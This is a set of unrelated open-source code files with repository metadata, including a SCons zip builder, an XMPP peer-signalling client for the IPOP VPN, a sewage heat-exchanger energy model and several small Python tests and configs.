for i, j, k in zip_iter(code, var_iter(code, a), var_iter(code, b),
var_iter(code, c, store_only = True)):
k.v = i + j
sum.v = sum + 1
av = vector_iter(code, extarray.extarray('I', range(16)))
bv = vector_iter(code, extarray.extarray('I', range(16, 32)))
cv = vector_iter(code, extarray.extarray('I', [0 for i in range(16)]), store_only = True)
for i, j, k in zip_iter(code, av, bv, cv):
k.v = vmx.vadduws.ex(i, j) # i + j
util.return_var(sum)
proc = synppc.Processor()
r = proc.execute(prgm, mode = 'int')
assert(r == 16)
print a
print b
print c
print av.data
print bv.data
print cv.data
print 'TODO: Finish checking TestZipIter values'
return
# def TestParallelIter():
# code = ParallelInstructionStream()
# proc = synppc.Processor()
# result = array.array('I', [42,42,42,13,13,13])
# data = array.array('I', range(16))
# # code.add(ppc.Illegal())
# a = metavar.var(code, 0)
# rank = metavar.int_var(code, reg = code.r_rank)
# # for i, j in parallel(zip_iter(code, syn_iter(code, 16), syn_range(code, 16, 32))):
# # a.v = i
# # for i in parallel(syn_range(code, 16, 32)):
# # a.v = i
# for i in parallel(vector_iter(code, data)):
# i.v = i + 1
# metavar.syn_return(code, a)
# t1 = proc.execute(code, mode='async', params=(0,2,0))
# t2 = proc.execute(code, mode='async', params=(1,2,0))
# proc.join(t1)
# proc.join(t2)
# print data
# return
if __name__=='__main__':
# TestMemoryMap()
util.RunTest(TestIter)
util.RunTest(TestExternalStop)
util.RunTest(TestNestedIter)
util.RunTest(TestRange)
util.RunTest(TestVarIter)
util.RunTest(TestMemoryDesc)
util.RunTest(TestVecIter)
util.RunTest(TestZipIter)
# TestParallelIter()
|
matthiaskramm/corepy
|
corepy/arch/ppc/lib/iterators.py
|
Python
|
bsd-3-clause
| 27,693
|
from django.apps import AppConfig
class UserPanelConfig(AppConfig):
name = 'djdt_user_panel'
|
rosco77/djdt_user_panel
|
djdt_user_panel/apps.py
|
Python
|
bsd-3-clause
| 99
|
from __future__ import annotations
import os
from xia2.Driver.DriverFactory import DriverFactory
def ImportXDS(DriverType=None):
"""A factory for ImportXDSWrapper classes."""
DriverInstance = DriverFactory.Driver(DriverType)
class ImportXDSWrapper(DriverInstance.__class__):
def __init__(self):
super().__init__()
self.set_executable("dials.import_xds")
self._spot_xds = None
self._integrate_hkl = None
self._xparm_xds = None
self._experiments_json = None
self._reflection_filename = None
def set_spot_xds(self, spot_xds):
self._spot_xds = spot_xds
def set_integrate_hkl(self, integrate_hkl):
self._integrate_hkl = integrate_hkl
def set_xparm_xds(self, xparm_xds):
self._xparm_xds = xparm_xds
def set_experiments_json(self, experiments_json):
self._experiments_json = experiments_json
def get_reflection_filename(self):
return self._reflection_filename
def get_experiments_json(self):
return self._experiments_json
def run(self):
self.clear_command_line()
if self._spot_xds is not None:
self._reflection_filename = os.path.join(
self.get_working_directory(), "%s_spot_xds.refl" % self.get_xpid()
)
self.add_command_line(self._spot_xds)
self.add_command_line("output.filename=%s" % self._reflection_filename)
self.add_command_line("method=reflections")
elif self._integrate_hkl is not None:
self._reflection_filename = os.path.join(
self.get_working_directory(),
"%s_integrate_hkl.refl" % self.get_xpid(),
)
assert self._experiments_json is not None
self.add_command_line(self._integrate_hkl)
self.add_command_line(self._experiments_json)
self.add_command_line("output.filename=%s" % self._reflection_filename)
self.add_command_line("method=reflections")
elif self._xparm_xds is not None:
if self._experiments_json is None:
self._experiments_json = os.path.join(
self.get_working_directory(),
"%s_xparm_xds.expt" % self.get_xpid(),
)
directory, xparm = os.path.split(self._xparm_xds)
self.add_command_line(directory)
self.add_command_line("xds_file=%s" % xparm)
self.add_command_line("output.filename=%s" % self._experiments_json)
self.start()
self.close_wait()
self.check_for_errors()
if self._reflection_filename is not None:
assert os.path.exists(
self._reflection_filename
), self._reflection_filename
else:
assert os.path.exists(self._experiments_json), self._experiments_json
return ImportXDSWrapper()
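# Hedged usage sketch (comment added for illustration; 'SPOT.XDS' is just an
# example file name):
#   importer = ImportXDS()
#   importer.set_spot_xds('SPOT.XDS')
#   importer.run()
#   refl = importer.get_reflection_filename()
# Exactly one of the spot/integrate/xparm inputs should be set before run().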
|
xia2/xia2
|
src/xia2/Wrappers/Dials/ImportXDS.py
|
Python
|
bsd-3-clause
| 3,161
|
"""SCons.Tool.zip
Tool-specific initialization for zip.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os.path
import SCons.Builder
import SCons.Defaults
import SCons.Node.FS
import SCons.Util
try:
import zipfile
internal_zip = 1
except ImportError:
internal_zip = 0
if internal_zip:
zipcompression = zipfile.ZIP_DEFLATED
def zip(target, source, env):
def visit(arg, dirname, names):
for name in names:
path = os.path.join(dirname, name)
if os.path.isfile(path):
arg.write(path)
compression = env.get('ZIPCOMPRESSION', 0)
zf = zipfile.ZipFile(str(target[0]), 'w', compression)
for s in source:
if s.isdir():
os.path.walk(str(s), visit, zf)
else:
zf.write(str(s))
zf.close()
else:
zipcompression = 0
zip = "$ZIP $ZIPFLAGS ${TARGET.abspath} $SOURCES"
zipAction = SCons.Action.Action(zip, varlist=['ZIPCOMPRESSION'])
ZipBuilder = SCons.Builder.Builder(action = SCons.Action.Action('$ZIPCOM', '$ZIPCOMSTR'),
source_factory = SCons.Node.FS.Entry,
source_scanner = SCons.Defaults.DirScanner,
suffix = '$ZIPSUFFIX',
multi = 1)
def generate(env):
"""Add Builders and construction variables for zip to an Environment."""
try:
bld = env['BUILDERS']['Zip']
except KeyError:
bld = ZipBuilder
env['BUILDERS']['Zip'] = bld
env['ZIP'] = 'zip'
env['ZIPFLAGS'] = SCons.Util.CLVar('')
env['ZIPCOM'] = zipAction
env['ZIPCOMPRESSION'] = zipcompression
env['ZIPSUFFIX'] = '.zip'
def exists(env):
return internal_zip or env.Detect('zip')
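# Hedged usage sketch (comment added for illustration; the SConstruct snippet
# assumes this tool has been loaded into the environment):
#   env = Environment(tools=['zip'])
#   env.Zip('archive.zip', ['src', 'README'])
# With the internal zipfile module available, ZIPCOMPRESSION defaults to
# zipfile.ZIP_DEFLATED; otherwise the external 'zip' command is invoked.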
|
datalogics/scons
|
src/engine/SCons/Tool/zip.py
|
Python
|
mit
| 3,093
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-31 10:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TestModel1',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('symbol', models.CharField(blank=True, max_length=1, null=True)),
],
),
migrations.CreateModel(
name='TestModel2',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('other_model', models.ManyToManyField(to='core.TestModel1')),
],
),
]
|
dahfool/navigator
|
core/migrations/0001_initial.py
|
Python
|
mit
| 1,001
|
#!/usr/bin/env python
import sys
import json
import time
import ssl  # needed below for ssl.PROTOCOL_TLSv1 when x509 authentication is used
from controller.framework.ControllerModule import ControllerModule
import controller.framework.fxlib as fxlib
import sleekxmpp
from collections import defaultdict
from sleekxmpp.xmlstream.stanzabase import ElementBase, ET, JID
from sleekxmpp.xmlstream import register_stanza_plugin
from sleekxmpp.xmlstream.handler.callback import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.stanza.message import Message
from sleekxmpp.plugins.base import base_plugin
py_ver = sys.version_info[0]
if py_ver == 3:
import _thread as thread
else:
import thread
#set up a new custom message stanza
class Ipop_Msg(ElementBase):
namespace = 'Conn_setup'
name = 'Ipop'
plugin_attrib = 'Ipop'
interfaces = set(('setup','payload','uid'))
subinterfaces = interfaces
class XmppClient(ControllerModule,sleekxmpp.ClientXMPP):
def __init__(self,CFxHandle,paramDict,ModuleName):
ControllerModule.__init__(self,CFxHandle,paramDict,ModuleName)
# keeps track of last recvd advertisement and if node is active on XMPP.
self.xmpp_peers = defaultdict(lambda:[0,False])
# need to maintain uid<->jid mapping to route xmpp messages.
self.uid_jid = {}
        # peer UID, knows-my-UID flag, num of correct advts recvd
self.jid_uid = defaultdict(lambda:['',False,1])
self.xmpp_username = self.CMConfig.get("xmpp_username")
self.xmpp_passwd = self.CMConfig.get("xmpp_password")
self.xmpp_host = self.CMConfig.get("xmpp_host")
self.xmpp_port = self.CMConfig.get("xmpp_port")
self.vpn_type = self.CFxHandle.queryParam("vpn_type")
self.uid = ""
        # time of last sent xmpp advt.
self.last_sent_advt = 0
# keeps track of if xmpp advt recvd in interval
self.xmpp_advt_recvd = True
# Initial ADVT Delay
        self.INITIAL_ADVT_DELAY = 5
# interval between sending advertisements
self.advt_delay = self.INITIAL_ADVT_DELAY
# Maximum delay between advertisements is 10 minutes
self.MAX_ADVT_DELAY = 600
# initialize the base Xmpp client class, handle login/authentication.
if self.CMConfig.get("xmpp_authentication_method")=="x509" and \
(self.CMConfig.get("xmpp_username")!= None \
or self.CMConfig.get("xmpp_password")!= None):
raise RuntimeError("x509 Authentication Exception. Username or Password present in IPOP configuration file.")
use_tls = True
if self.CMConfig.get("xmpp_authentication_method")=="x509":
sleekxmpp.ClientXMPP.__init__(self,self.xmpp_host,self.xmpp_passwd,sasl_mech='EXTERNAL')
self.ssl_version = ssl.PROTOCOL_TLSv1
self.ca_certs = self.CMConfig.get("truststore")
self.certfile = self.CMConfig.get("certdirectory")+self.CMConfig.get("certfile")
self.keyfile = self.CMConfig.get("certdirectory")+self.CMConfig.get("keyfile")
else:
sleekxmpp.ClientXMPP.__init__(self, self.xmpp_username, self.xmpp_passwd, sasl_mech='PLAIN')
if self.CMConfig.get("xmpp_accept_untrusted_server")==True:
self['feature_mechanisms'].unencrypted_plain = True
use_tls = False
else:
self.ca_certs = self.CMConfig.get("truststore")
# register a new plugin stanza and handler for it,
# whenever a matching message will be received on
# the xmpp stream , registered handler will be called.
register_stanza_plugin(Message, Ipop_Msg)
self.registerHandler(
Callback('Ipop',
StanzaPath('message/Ipop'),
self.MsgListener))
# Register event handler for session start
self.add_event_handler("session_start",self.start)
# calculate UID, for the meantime
# address mapping
self.uid_ip4_table = {}
self.ip4_uid_table = {}
# populate uid_ip4_table and ip4_uid_table with all UID and IPv4
# mappings within the /16 subnet
if (self.vpn_type == "GroupVPN"):
parts = self.CFxHandle.queryParam("ip4").split(".")
ip_prefix = parts[0] + "." + parts[1] + "."
for i in range(0, 255):
for j in range(0, 255):
ip4 = ip_prefix + str(i) + "." + str(j)
uid = fxlib.gen_uid(ip4)
self.uid_ip4_table[uid] = ip4
self.ip4_uid_table[ip4] = uid
self.uid = self.ip4_uid_table[self.CFxHandle.queryParam("ip4")]
elif (self.vpn_type == "SocialVPN"):
self.registerCBT('Watchdog', 'QUERY_IPOP_STATE')
# Start xmpp handling thread
self.xmpp_handler()
# Triggered at start of XMPP session
def start(self,event):
self.get_roster()
self.send_presence()
# Add handler for incoming presence messages.
self.add_event_handler("presence_available",self.handle_presence)
# will need to handle presence, to keep track of who is online.
def handle_presence(self,presence):
presence_sender = presence['from']
if (self.xmpp_peers[presence_sender][1]==False):
self.xmpp_peers[presence_sender]=[time.time(),True]
self.log("presence received from {0}".format(presence_sender))
    # This handler method listens for matched messages on the xmpp stream,
    # extracts the setup and payload, and takes suitable action depending
    # on them.
def MsgListener(self,msg):
if (self.uid == ""):
self.log("UID not yet received- Not Ready.")
return
# extract setup and content
setup = str(msg['Ipop']['setup'])
payload = str(msg['Ipop']['payload'])
msg_type,target_uid,target_jid = setup.split("#")
sender_jid = msg['from']
if (msg_type == "regular_msg"):
self.log("Recvd mesage from {0}".format(msg['from']))
self.log("Msg is {0}".format(payload))
elif (msg_type == "xmpp_advertisement"):
# peer_uid - uid of the node that sent the advt
            # target_uid - what it perceives as my uid
try:
peer_uid,target_uid = payload.split("#")
if (peer_uid != self.uid):
# update last known advt reception time in xmpp_peers
self.xmpp_peers[sender_jid][0] = time.time()
self.uid_jid[peer_uid] = sender_jid
self.jid_uid[msg['from']][0] = peer_uid
# sender knows my uid, so I will not send an advert to him
if (target_uid == self.uid):
self.jid_uid[msg['from']][1] = True
# recvd correct advertisement
self.jid_uid[msg['from']][2]+=1
else:
self.jid_uid[msg['from']][1] = False
msg = {}
msg["uid"] = peer_uid
msg["data"] = peer_uid
msg["type"] = "xmpp_advertisement"
if (self.vpn_type == "GroupVPN"):
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
elif (self.vpn_type == "SocialVPN"):
self.registerCBT('Watchdog','XMPP_MSG',msg)
# refresh xmpp advt recvd flag
self.xmpp_advt_recvd = True
self.log("recvd xmpp_advt from {0}".format(msg["uid"]))
except:
self.log("advt_payload: {0}".format(payload))
# compare uid's here , if target uid does not match with mine do nothing.
# have to avoid loop messages.
if (target_uid == self.uid):
sender_uid,recvd_data = payload.split("#")
# If I recvd XMPP msg from this peer, I should record his UID-JID & JID-UID
self.uid_jid[sender_uid] = sender_jid
if (msg_type == "con_req"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "con_req"
# send this CBT to BaseTopology Manager
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_req from {0}".format(msg["uid"]))
elif (msg_type == "con_resp"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "peer_con_resp"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_resp from {0}".format(msg["uid"]))
elif (msg_type == "con_ack"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "con_ack"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_ack from {0}".format(msg["uid"]))
elif (msg_type == "ping_resp"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "ping_resp"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd ping_resp from {0}".format(msg["uid"]))
elif (msg_type == "ping"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "ping"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd ping from {0}".format(msg["uid"]))
def sendMsg(self,peer_jid,setup_load=None,msg_payload=None):
if (setup_load == None):
setup_load = "regular_msg" + "#" + "None" + "#" + peer_jid.full
else:
setup_load = setup_load + "#" + peer_jid.full
if py_ver != 3:
setup_load = unicode(setup_load)
if (msg_payload==None):
content_load = "Hello there this is {0}".format(self.xmpp_username)
else:
content_load = msg_payload
msg = self.Message()
msg['to'] = peer_jid.bare
msg['type'] = 'chat'
msg['Ipop']['setup'] = setup_load
msg['Ipop']['payload'] = content_load
msg.send()
self.log("Sent a message to {0}".format(peer_jid))
def xmpp_handler(self):
try:
if (self.connect(address = (self.xmpp_host,self.xmpp_port))):
thread.start_new_thread(self.process,())
self.log("Started XMPP handling")
except:
self.log("Unable to start XMPP handling thread-Check Internet connectivity/credentials.",severity='error')
def log(self,msg,severity='info'):
self.registerCBT('Logger',severity,msg)
def initialize(self):
self.log("{0} module Loaded".format(self.ModuleName))
def processCBT(self, cbt):
if (cbt.action == 'QUERY_IPOP_STATE_RESP'):
if cbt.data != None:
self.uid = cbt.data["_uid"]
self.log("UID {0} received from Watchdog".format(self.uid))
if (cbt.action == "DO_SEND_MSG"):
if (self.uid == ""):
self.log("UID not yet received- Not Ready.")
return
method = cbt.data.get("method")
peer_uid = cbt.data.get("uid")
try:
peer_jid = self.uid_jid[peer_uid]
            except KeyError:
                log_msg = ("UID-JID mapping for UID: {0} not present. "
                           "msg: {1} will not be sent.").format(peer_uid, method)
self.log(log_msg)
return
data = cbt.data.get("data")
if (method == "con_req"):
setup_load = "con_req"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_req to {0}".format(self.uid_jid[peer_uid]))
elif (method == "con_resp"):
setup_load = "con_resp"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_resp to {0}".format(self.uid_jid[peer_uid]))
elif (method == "con_ack"):
setup_load = "con_ack"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_ack to {0}".format(self.uid_jid[peer_uid]))
elif (method == "ping_resp"):
setup_load = "ping_resp"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent ping_resp to {0}".format(self.uid_jid[peer_uid]))
elif (method == "ping"):
setup_load = "ping"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent ping to {0}".format(self.uid_jid[peer_uid]))
def sendXmppAdvt(self,override=False):
if (self.uid != ""):
for peer in self.xmpp_peers.keys():
send_advt = False
                # jid_uid[peer][1] is True when the peer already knows my UID.
                # Even then, after every 10 correct advertisements received
                # from the peer, reply back in case my earlier reply was lost.
if (self.jid_uid[peer][1] == True and self.jid_uid[peer][2]%10==0):
send_advt = True
self.jid_uid[peer][2] = 1
elif (self.jid_uid[peer][1] == True and override != True):
# Do not send an advt
send_advt = False
else:
                    # If here, the peer does not know my UID
send_advt = True
if (send_advt == True):
setup_load = "xmpp_advertisement"+"#"+"None"
msg_load = str(self.uid) + "#" + str(self.jid_uid[peer][0])
self.sendMsg(peer,setup_load,msg_load)
self.log("sent xmpp_advt to {0}".format(peer))
def timer_method(self):
if (self.uid == "" and self.vpn_type == "SocialVPN"):
self.log("UID not yet received- Not Ready.")
self.registerCBT('Watchdog', 'QUERY_IPOP_STATE')
return
try:
if (time.time() - self.last_sent_advt > self.advt_delay):
                # see if I recvd an advertisement in this time period
                # if yes then the XMPP link is open
if (self.xmpp_advt_recvd == True):
self.sendXmppAdvt()
# update xmpp tracking parameters.
self.last_sent_advt = time.time()
self.xmpp_advt_recvd = False
self.advt_delay = self.INITIAL_ADVT_DELAY
                # Have not heard from anyone in a while; back off to handle
                # XMPP disconnection without overwhelming peers with queued messages.
elif (self.advt_delay < self.MAX_ADVT_DELAY):
self.advt_delay = 2 * self.advt_delay
self.log("Delaying the XMPP advt timer \
to {0} seconds".format(self.advt_delay))
else:
# send the advertisement anyway, after MaxDelay.
self.sendXmppAdvt(override=True)
# update xmpp tracking parameters.
self.last_sent_advt = time.time()
self.xmpp_advt_recvd = False
except:
self.log("Exception in XmppClient timer")
def terminate(self):
pass
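# Illustration (not part of the module) of the '#'-delimited wire format
# composed by sendMsg() and parsed by MsgListener(); the UID and JID values
# below are hypothetical:
#
#   setup = "con_req" + "#" + "deadbeef01" + "#" + "alice@example.org/ipop"
#   msg_type, target_uid, target_jid = setup.split("#")
#   payload = "cafebabe02" + "#" + "<connection data>"
#   sender_uid, recvd_data = payload.split("#")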
|
ipop-project/controllers
|
controller/modules/XmppClient.py
|
Python
|
mit
| 16,248
|
# -*- coding: utf-8 -*-
"""
Sewage source heat exchanger
"""
import pandas as pd
import numpy as np
import scipy
from cea.constants import HEX_WIDTH_M,VEL_FLOW_MPERS, HEAT_CAPACITY_OF_WATER_JPERKGK, H0_KWPERM2K, MIN_FLOW_LPERS, T_MIN, AT_MIN_K, P_SEWAGEWATER_KGPERM3, P_WATER_KGPERM3
import cea.config
import cea.inputlocator
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def calc_sewage_heat_exchanger(locator, config):
"""
Calaculate the heat extracted from the sewage HEX.
:param locator: an InputLocator instance set to the scenario to work on
:param Length_HEX_available: HEX length available
:type Length_HEX_available: float
Save the results to `SWP.csv`
"""
# local variables
mcpwaste = []
twaste = []
mXt = []
counter = 0
names = pd.read_csv(locator.get_total_demand()).Name
sewage_water_ratio = config.sewage.sewage_water_ratio
heat_exchanger_length = config.sewage.heat_exchanger_length
V_lps_external = config.sewage.sewage_water_district
for building_name in names:
building = pd.read_csv(locator.get_demand_results_file(building_name))
mcp_combi, t_to_sewage = np.vectorize(calc_Sewagetemperature)(building.Qww_sys_kWh, building.Qww_kWh, building.Tww_sys_sup_C,
building.Tww_sys_re_C, building.mcptw_kWperC, building.mcpww_sys_kWperC, sewage_water_ratio)
mcpwaste.append(mcp_combi)
twaste.append(t_to_sewage)
mXt.append(mcp_combi*t_to_sewage)
counter = counter +1
mcpwaste_zone = np.sum(mcpwaste, axis =0)
mXt_zone = np.sum(mXt, axis =0)
twaste_zone = [x * (y**-1) * 0.8 if y != 0 else 0 for x,y in zip (mXt_zone, mcpwaste_zone)] # lossess in the grid of 20%
Q_source, t_source, t_out, tin_e, tout_e, mcpwaste_total = np.vectorize(calc_sewageheat)(mcpwaste_zone, twaste_zone, HEX_WIDTH_M,
VEL_FLOW_MPERS, H0_KWPERM2K, MIN_FLOW_LPERS,
heat_exchanger_length, T_MIN, AT_MIN_K, V_lps_external)
#save to disk
pd.DataFrame({"Qsw_kW" : Q_source, "Ts_C" : t_source, "T_out_sw_C" : t_out, "T_in_sw_C" : twaste_zone,
"mww_zone_kWperC":mcpwaste_total,
"T_out_HP_C" : tout_e, "T_in_HP_C" : tin_e}).to_csv(locator.get_sewage_heat_potential(),
index=False, float_format='%.3f')
# Calc Sewage heat
def calc_Sewagetemperature(Qwwf, Qww, tsww, trww, mcptw, mcpww, SW_ratio):
"""
Calculate sewage temperature and flow rate released from DHW usages and Fresh Water (FW) in buildings.
:param Qwwf: final DHW heat requirement
:type Qwwf: float
:param Qww: DHW heat requirement
:type Qww: float
:param tsww: DHW supply temperature
:type tsww: float
:param trww: DHW return temperature
:type trww: float
    :param mcptw: fresh water heat capacity
    :type mcptw: float
:param mcpww: DHW heat capacity
:type mcpww: float
:param SW_ratio: ratio of decrease/increase in sewage water due to solids and also water intakes.
:type SW_ratio: float
:returns mcp_combi: sewage water heat capacity [kW_K]
:rtype mcp_combi: float
:returns t_to_sewage: sewage water temperature
:rtype t_to_sewage: float
"""
if Qwwf > 0:
Qloss_to_spur = Qwwf - Qww
t_spur = tsww - Qloss_to_spur / mcpww
m_DHW = mcpww * SW_ratio
m_TW = mcptw * SW_ratio
mcp_combi = m_DHW + m_TW
t_combi = ( m_DHW * t_spur + m_TW * trww ) / mcp_combi
        t_to_sewage = 0.90 * t_combi # assuming 10% thermal loss through piping
else:
t_to_sewage = trww
mcp_combi = mcptw * SW_ratio # in [kW_K]
    return mcp_combi, t_to_sewage # in [kW/K] and [C]
def calc_sewageheat(mcp_kWC_zone, tin_C, w_HEX_m, Vf_ms, h0, min_lps, L_HEX_m, tmin_C, ATmin, V_lps_external):
"""
Calculates the operation of sewage heat exchanger.
    :param mcp_kWC_zone: heat capacity of the total sewage in a zone
    :type mcp_kWC_zone: float
:param tin_C: sewage inlet temperature of a zone
:type tin_C: float
:param w_HEX_m: width of the sewage HEX
:type w_HEX_m: float
:param Vf_ms: sewage flow rate [m/s]
:type Vf_ms: float
    :param V_lps_external: externally supplied sewage water flow rate [lps]
    :type V_lps_external: float
:param h0: sewage heat transfer coefficient
:type h0: float
:param min_lps: sewage minimum flow rate in [lps]
:type min_lps: float
:param L_HEX_m: HEX length available
:type L_HEX_m: float
:param tmin_C: minimum temperature of extraction
:type tmin_C: float
    :param ATmin: minimum approach temperature difference [K]
    :type ATmin: float
:returns Q_source: heat supplied by sewage
:rtype: float
:returns t_source: sewage heat supply temperature
:rtype t_source: float
    :returns tb2: sewage return temperature
    :rtype tb2: float
:returns ta1: temperature inlet of the cold stream (from the HP)
:rtype ta1: float
:returns ta2: temperature outlet of the cold stream (to the HP)
:rtype ta2: float
    ..[J.A. Fonseca et al., 2016] J.A. Fonseca, Thuy-An Nguyen, Arno Schlueter, Francois Marechal (2016). City Energy
Analyst (CEA): Integrated framework for analysis and optimization of building energy systems in neighborhoods and
city districts. Energy and Buildings.
"""
V_lps_zone = mcp_kWC_zone/ (HEAT_CAPACITY_OF_WATER_JPERKGK / 1E3)
V_lps_total = V_lps_zone + V_lps_external
mcp_kWC_total = mcp_kWC_zone + ((V_lps_external /1000) * P_SEWAGEWATER_KGPERM3 * (HEAT_CAPACITY_OF_WATER_JPERKGK/1E3)) #kW_C
mcp_max = (Vf_ms * w_HEX_m * 0.20) * P_SEWAGEWATER_KGPERM3 * (HEAT_CAPACITY_OF_WATER_JPERKGK /1E3) # 20 cm is the depth of the active water in contact with the HEX
A_HEX = w_HEX_m * L_HEX_m # area of heat exchange
if min_lps < V_lps_total:
if mcp_kWC_total >= mcp_max:
mcp_kWC_total = mcp_max
# B is the sewage, A is the heat pump
mcpa = mcp_kWC_total * 1.1 # the flow in the heat pumps slightly above the flow on the sewage side
tb1 = tin_C
ta1 = tin_C - ((tin_C - tmin_C) + ATmin / 2)
alpha = h0 * A_HEX * (1 / mcpa - 1 / mcp_kWC_total)
n = ( 1 - scipy.exp( -alpha ) ) / (1 - mcpa / mcp_kWC_total * scipy.exp(-alpha))
tb2 = tb1 + mcpa / mcp_kWC_total * n * (ta1 - tb1)
Q_source = mcp_kWC_total * (tb1 - tb2)
ta2 = ta1 + Q_source / mcpa
t_source = ( tb2 + tb1 ) / 2
else:
tb1 = tin_C
tb2 = tin_C
ta1 = tin_C
ta2 = tin_C
Q_source = 0
t_source = tin_C
return Q_source, t_source, tb2, ta1, ta2, mcp_kWC_total
def main(config):
locator = cea.inputlocator.InputLocator(config.scenario)
calc_sewage_heat_exchanger(locator=locator, config=config)
if __name__ == '__main__':
main(cea.config.Configuration())
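# A standalone numeric sketch (assumed values, not CEA data) of the
# counter-flow effectiveness relation used in calc_sewageheat() above:
#
#   import math
#   h0, A_HEX = 1.5, 120.0      # heat transfer coeff [kW/m2K], HEX area [m2]
#   mcpb = 10.0                 # sewage-side heat capacity flow [kW/K]
#   mcpa = mcpb * 1.1           # heat-pump side, 10% above the sewage side
#   alpha = h0 * A_HEX * (1 / mcpa - 1 / mcpb)
#   n = (1 - math.exp(-alpha)) / (1 - mcpa / mcpb * math.exp(-alpha))
#   tb1, ta1 = 25.0, 12.0       # sewage and heat-pump inlet temperatures [C]
#   tb2 = tb1 + mcpa / mcpb * n * (ta1 - tb1)   # sewage outlet, ~12.3 C here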
|
architecture-building-systems/CEAforArcGIS
|
cea/resources/sewage_heat_exchanger.py
|
Python
|
mit
| 7,301
|
"""
Testing reload.
"""
from __future__ import division
from __future__ import unicode_literals
__author__ = "Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import os
import shutil
import logging
import unittest
import tempfile
import deepchem as dc
import numpy as np
logger = logging.getLogger(__name__)
class TestReload(unittest.TestCase):
"""
Test reload for datasets.
"""
def _run_muv_experiment(self, dataset_file, reload=False):
"""Loads or reloads a small version of MUV dataset."""
# Load MUV dataset
logger.info("About to featurize compounds")
featurizer = dc.feat.CircularFingerprint(size=1024)
raw_dataset = dc.utils.save.load_from_disk(dataset_file)
MUV_tasks = [
'MUV-692', 'MUV-689', 'MUV-846', 'MUV-859', 'MUV-644', 'MUV-548',
'MUV-852', 'MUV-600', 'MUV-810', 'MUV-712', 'MUV-737', 'MUV-858',
'MUV-713', 'MUV-733', 'MUV-652', 'MUV-466', 'MUV-832'
]
loader = dc.data.CSVLoader(
tasks=MUV_tasks, smiles_field="smiles", featurizer=featurizer)
dataset = loader.featurize(dataset_file)
assert len(dataset) == len(raw_dataset)
logger.info("About to split compounds into train/valid/test")
splitter = dc.splits.ScaffoldSplitter()
frac_train, frac_valid, frac_test = .8, .1, .1
train_dataset, valid_dataset, test_dataset = \
splitter.train_valid_test_split(
dataset, log_every_n=1000, frac_train=frac_train,
frac_test=frac_test, frac_valid=frac_valid)
# Do an approximate comparison since splits are sometimes slightly off from
# the exact fraction.
assert dc.utils.evaluate.relative_difference(
len(train_dataset), frac_train * len(dataset)) < 1e-3
assert dc.utils.evaluate.relative_difference(
len(valid_dataset), frac_valid * len(dataset)) < 1e-3
assert dc.utils.evaluate.relative_difference(
len(test_dataset), frac_test * len(dataset)) < 1e-3
# TODO(rbharath): Transformers don't play nice with reload! Namely,
# reloading will cause the transform to be reapplied. This is undesirable in
# almost all cases. Need to understand a method to fix this.
transformers = [
dc.trans.BalancingTransformer(transform_w=True, dataset=train_dataset)
]
logger.info("Transforming datasets")
for dataset in [train_dataset, valid_dataset, test_dataset]:
for transformer in transformers:
dataset = transformer.transform(dataset)
return (len(train_dataset), len(valid_dataset), len(test_dataset))
def test_reload_after_gen(self):
